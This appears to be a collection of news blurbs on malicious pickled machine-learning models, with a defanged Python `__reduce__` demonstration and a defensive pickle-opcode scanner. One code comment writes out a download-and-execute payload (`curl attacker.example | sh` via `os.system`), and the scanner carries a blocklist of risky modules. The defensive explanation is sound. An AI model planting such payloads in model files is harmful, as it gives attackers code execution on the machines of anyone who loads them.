Researchers have devised a new way of manipulating machine learning (ML) models by injecting malicious code into the serialization process. The method focuses on the "pickling" process used to ...
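To see why pickling is such an attractive injection point, note that Python's pickle format lets an object specify, via `__reduce__`, an arbitrary callable to be invoked at load time. The sketch below is a hypothetical, defanged illustration of that mechanism: it substitutes a harmless `eval` where a real attack would reference something like `os.system`.

```python
import pickle

class EvilArtifact:
    """Stand-in for a tampered model object (illustrative, not from any
    real malicious sample)."""

    def __reduce__(self):
        # __reduce__ tells pickle what call to perform when the bytes are
        # deserialized. A real payload would return something like
        # (os.system, ("curl attacker.example | sh",)); here we use a
        # benign eval so the demo is safe to run.
        return (eval, ("6 * 7",))

payload = pickle.dumps(EvilArtifact())
# Merely loading the bytes executes the embedded call -- no method on the
# object ever needs to be invoked by the victim.
result = pickle.loads(payload)
```

This is why loading an untrusted pickled model file is equivalent to running untrusted code: the execution happens during deserialization itself.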
Researchers at ReversingLabs have discovered two malicious machine learning (ML) models available on Hugging Face, the leading hub for sharing AI models and applications. While these models contain ...
Attackers are finding more and more ways to post malicious projects to Hugging Face and other repositories for open source artificial intelligence (AI) models while evading the sites' security checks ...
Security researchers have discovered malicious ML models on the Hugging Face AI development platform. Attackers could use them to inject commands into maliciously manipulated ...
Fake Alibaba Labs AI SDKs hosted on PyPI included PyTorch models with infostealer code inside. With tooling to detect malicious code inside ML models still lacking, expect the technique to spread.
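Detection tooling is thin, but one practical heuristic is to statically inspect a pickle stream's opcodes for imports of risky modules before ever deserializing it. The scanner below is a minimal sketch using only the standard-library `pickletools` module; the module blocklist and the `scan_pickle` helper are assumptions for illustration, not a complete or production-grade defense.

```python
import pickle
import pickletools

# Hypothetical blocklist -- a real scanner would be far more thorough.
SUSPICIOUS = {"os", "posix", "nt", "subprocess", "builtins"}

def scan_pickle(data: bytes) -> list[str]:
    """Return risky module.attribute imports found in a pickle stream.

    Handles the legacy GLOBAL opcode (module and name in the argument)
    and the newer STACK_GLOBAL opcode, which pops the module and name
    from preceding string pushes. Never executes the payload.
    """
    findings: list[str] = []
    strings: list[str] = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            if module in SUSPICIOUS:
                findings.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            module, name = strings[-2], strings[-1]
            if module in SUSPICIOUS:
                findings.append(f"{module}.{name}")
    return findings

class Demo:
    """Defanged test payload that imports builtins.eval at load time."""
    def __reduce__(self):
        return (eval, ("1 + 1",))

flags = scan_pickle(pickle.dumps(Demo()))
```

Opcode scanning like this is how tools such as `picklescan` approach the problem; for PyTorch specifically, loading weights with `torch.load(..., weights_only=True)` avoids arbitrary-object deserialization entirely.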